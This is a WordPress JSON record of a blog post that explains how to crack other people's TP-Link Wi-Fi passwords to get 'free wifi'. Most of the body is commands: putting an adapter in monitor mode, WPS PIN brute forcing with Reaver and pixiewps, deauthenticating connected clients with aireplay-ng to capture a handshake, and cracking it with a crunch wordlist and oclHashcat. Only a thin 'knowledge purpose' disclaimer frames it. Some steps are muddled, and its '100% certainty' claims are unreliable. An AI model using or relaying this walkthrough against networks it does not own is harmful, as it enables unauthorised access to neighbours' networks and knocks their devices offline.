{"id":18324,"date":"2017-05-17T11:24:25","date_gmt":"2017-05-17T05:54:25","guid":{"rendered":"https:\/\/www.wikitechy.com\/technology\/?p=18324"},"modified":"2021-06-02T18:42:04","modified_gmt":"2021-06-02T13:12:04","slug":"pro-hack-tp-link-wifi-password","status":"publish","type":"post","link":"https:\/\/www.wikitechy.com\/technology\/pro-hack-tp-link-wifi-password\/","title":{"rendered":"[Pro] How to hack a TP link Wifi Password"},"content":{"rendered":"<p style=\"text-align: justify;\">If you wanna be a professional CEH then having a complete hacking workstation is the first stage. A good hacker always makes sure he has all the things that he needs from good and powerful peripherals and software\/tools. Everything has its own importance to kickstart a journey of becoming a professional hacker. If you work as CEH in a company then might have to attend the Zoom meeting on a regular basis and having little of incoivnice can ruin an impression among your team whether it&#8217;s outer noise or your low quality webcam. If you&#8217;re looking forward to replacing your webcam then we would like to suggest you to check out this <a href=\"https:\/\/www.khojdeal.com\/deals\/best-web-cameras\/\" target=\"_blank\" rel=\"noopener\">best webcam in India<\/a> buying guide to explore some of the best seller webcams which every professional uses regardless of their profession.<br \/>\nSo without further ado let&#8217;s dive into the guide to hack TP link WiFi password.<\/p>\n<p style=\"text-align: justify;\">Today I\u2019m going to share how to\u00a0<strong>hack TP link\u00a0router wifi<\/strong>\u00a0and\u00a0<strong>hack<\/strong>\u00a0<strong>wifi<\/strong>\u00a0<strong>password<\/strong>. In this article I will tell you simple method to get <a href=\"https:\/\/www.wikitechy.com\/technology\/get-free-wifi-free-wifi-hacking-tricks\/\" target=\"_blank\" rel=\"noopener\">free wifi.<\/a> Mainly this susceptibility is found in Tp link Router\u00a0wifi. Basically this article show you <a href=\"https:\/\/www.wikitechy.com\/technology\/hack-wifi-network-android-6-0-marshmallow\/\" target=\"_blank\" rel=\"noopener\">how to hack wifi network<\/a>. It is generally a bug which is found in the company routers. You just have to follow the steps to\u00a0<strong>hacking\u00a0<\/strong>of<strong>\u00a0TP Link wifi<\/strong>,it automatically connects to the wifi and this is 100% sured and tested trick. Just follow the Post \u2013\u00a0<strong>How To Hack Wifi Password<\/strong>.<\/p>\n[ad type=&#8221;banner&#8221;]\n<p><span style=\"color: #993300;\"><strong>Note:\u00a0<\/strong><\/span>This post is <strong><span style=\"color: #ff0000;\">only for knowledge purpose<\/span><\/strong> and i am not responsible for anything<\/p>\n<p>Through this you can easily <a href=\"https:\/\/www.wikitechy.com\/technology\/pro-hack-binatone-router-wifi-password\/\" target=\"_blank\" rel=\"noopener\">hack binatone wifi password<\/a> by using this trick. Follow the steps given below and use the free wifi near your home.<\/p>\n<h3 id=\"steps-to-to-hack-a-tp-link-wifi-password\"><span style=\"color: #003366;\"><strong>Steps To\u00a0 to Hack a TP link Wifi Password<\/strong><\/span><\/h3>\n<ol>\n<li>Put the device in Monitor mode <strong>Airmon-ng start wlan0<\/strong><\/li>\n<li>A monitoring interface will be started on<strong> wlan0mon<\/strong><\/li>\n<li>Use<strong> iwconfig to check<\/strong> if the interface MODE is in managed mode, if so then change it to monitor instead of managed with the following commands:<\/li>\n<\/ol>\n<blockquote><p>ifconfig wlan0mon down<br \/>\niwconfig wlan0mon mode monitor<br \/>\nifconfig wlan0mon up<\/p><\/blockquote>\n<ol start=\"4\">\n<li><strong>iwconfig check<\/strong> if the mode is monitoring mode now<\/li>\n<li><strong>airodump-ng wlan0mon<\/strong><\/li>\n<\/ol>\n<p>Start <strong>airodump-ng<\/strong> to get the <strong>BSSID<\/strong>, MAC address and channel of our target.<\/p>\n<p style=\"text-align: center;\"><code>airodump-ng -i wlan0mon<\/code><\/p>\n<p>Now pick your target and <strong>use the BSSID<\/strong> and the channel for <strong>Reaver:<\/strong><\/p>\n<p style=\"text-align: center;\"><code>Reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]<\/code><\/p>\n<p>We need the <strong>PKE, PKR, e-hash 1&amp;2, E\/R-nonce<\/strong> and the authkey from Reaver to use for pixiewps.<\/p>\n<p>Now start<strong> pixiewps<\/strong> with the following arguments:<\/p>\n[ad type=&#8221;banner&#8221;]\n<h3 id=\"components\"><span style=\"color: #000080;\">Components:<\/span><\/h3>\n<p>\u2013<strong>E-Hash1<\/strong> is a hash in which we brute force the first half of the PIN.<br \/>\n\u2013<strong>E-Hash2<\/strong> is a hash in which we brute force the second half of the PIN.<br \/>\n\u2013<strong>HMAC<\/strong> is a function that hashes all the data in parenthesis. The function is HMAC-SHA-256.<br \/>\n\u2013<strong>PSK1<\/strong> is the first half of the router\u2019s PIN (10,000 possibilities)<br \/>\n\u2013<strong>PSK2<\/strong> is the second half of the router\u2019s PIN (1,000 or 10,000 possibilities depending if we want to compute the checksum. We just do 10,000 because it makes no time difference and it\u2019s just easier.)<br \/>\n\u2013<strong>PKE<\/strong> is the Public Key of the Enrollee (used to verify the legitimacy of a WPS exchange and prevent replays.)<br \/>\n\u2013<strong>PKR<\/strong> is the Public Key of the Registrar (used to verify the legitimacy of a WPS exchange and prevent replays.)<\/p>\n<p>This router is not vulnerable to <strong>Pixie Dust WPS Attack<\/strong>.<\/p>\n<h3 id=\"reaver-wps-pin-attack\"><span style=\"color: #800080;\"><strong>Reaver WPS PIN Attack<\/strong><\/span><\/h3>\n<p>Let\u2019s try to hack this router using Reaver. Start Reaver with 5 seconds delay and imitating a win7 PC:<\/p>\n<p style=\"text-align: center;\"><code>reaver -i wlan0mon -b [BSSID] -vv -c 1 -d 5 -w<\/code><\/p>\n<p>Brute forcing the router with <strong>oclHashcat<\/strong><br \/>\nLet\u2019s see if we can get the password by capturing a 4-way handshake and an offline bruteforce attack with a default router password list. We will be using the following tools:<\/p>\n<ol>\n<li><strong>Crunch<\/strong> to generate the password list.<\/li>\n<li><strong>Airodump-ng<\/strong> to capture the 4-way handshake.<\/li>\n<li><strong>airplay-ng to force de-auth<\/strong> connected clients.<\/li>\n<li><strong>oclHashcat<\/strong> GPU on Windows.<\/li>\n<\/ol>\n<p>Let\u2019s start <strong>Crunch<\/strong> with the following command:<\/p>\n<p style=\"text-align: center;\"><code>crunch 8 8 1234567890 -o \/root\/Desktop\/88numlist.txt<\/code><\/p>\n<p>This might take a little while, the result is a 900 MB word-list containing all possible combinations of 8 digits. This word-list will hack a<strong> TP link WR841N<\/strong> router wireless network with 100% certainty.<\/p>\n<p>Let\u2019s capture the handshake with <strong>Airodump-ng and Aireplay-ng<\/strong> and start Airodump-ng to find our target with the following command:<\/p>\n<p style=\"text-align: center;\"><code>airodump-ng wlan0mon<\/code><\/p>\n<p>Now pick your<strong> target\u2019s BSSID<\/strong> and channel and restart <strong>Airodump-ng<\/strong> with the following command and look for a connected client:<\/p>\n<p style=\"text-align: center;\"><code>airodump-ng \u2013bssid [BSSID] -c [channel] -w [filepath to store .cap] wlan0mon<\/code><\/p>\n<p>Now de-auth the connected client using <strong>Aireplay-ng<\/strong> in a new terminal.<\/p>\n<p style=\"text-align: center;\"><code>aireplay-ng -0 2 -a [BSSID] -c [Client MAC] wlan0mon<\/code><\/p>\n<p><strong>De-auth succesful<\/strong> and the 4 way handshake is captured!<\/p>\n<p style=\"text-align: center;\"><code>Aircrack-ng aireplay-ng<\/code><\/p>\n<p><span style=\"color: #008080;\"><strong>Step 3: Bruteforce with default router password list<\/strong><\/span><br \/>\nWe\u2019ll use <strong>oclHashcat GPU<\/strong> on Windows to crack the <a href=\"https:\/\/www.wikitechy.com\/technology\/how-to-hack-afoundry-router-wifi-password\/\" target=\"_blank\" rel=\"noopener\">WiFi password<\/a> using the passwordlist we created earlier.<\/p>\n<p>We have to convert the <strong>.cap file to a .hccap<\/strong> first using the following command:<\/p>\n<p style=\"text-align: center;\"><code>aircrack-ng -J [Filepath to save .hccap file] [Filepath to .cap file]<\/code><\/p>\n[embedyt]http:\/\/www.youtube.com\/watch?v=WFncxKlmw2A&amp;width=500&amp;height=350[\/embedyt]\n<p>Start <strong>oclHashcat<\/strong> on Windows using the following command:<\/p>\n<p style=\"text-align: center;\"><code>oclhashcat64.exe -m 2500 -w 3 \u2013[gpu-temp-retain=60] \u2013status -o cracked.txt tplink.hccap 88numlist.txt<\/code><\/p>\n<p><span style=\"color: #993300;\"><strong>Note:<\/strong><\/span> \u2013gpu-temp-retain is <strong>AMD<\/strong> only.<\/p>\n[ad type=&#8221;banner&#8221;]\n<p>&nbsp;<\/p>\n<p>So this is\u00a0<strong>How to hack a TP link Wifi Password<\/strong>. Hack Tp Link and enjoy free wifi.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[Pro] How to hack a TP link Wifi Password &#8211; Hacking &#8211; This article show you how to hack wifi network. It is generally a bug which is found in the routers.<\/p>\n","protected":false},"author":2,"featured_media":19408,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29859,18379,7607],"tags":[],"class_list":["post-18324","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hacking","category-internet","category-networking"],"_links":{"self":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/posts\/18324","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/comments?post=18324"}],"version-history":[{"count":0,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/posts\/18324\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/media\/19408"}],"wp:attachment":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/media?parent=18324"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/categories?post=18324"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/tags?post=18324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}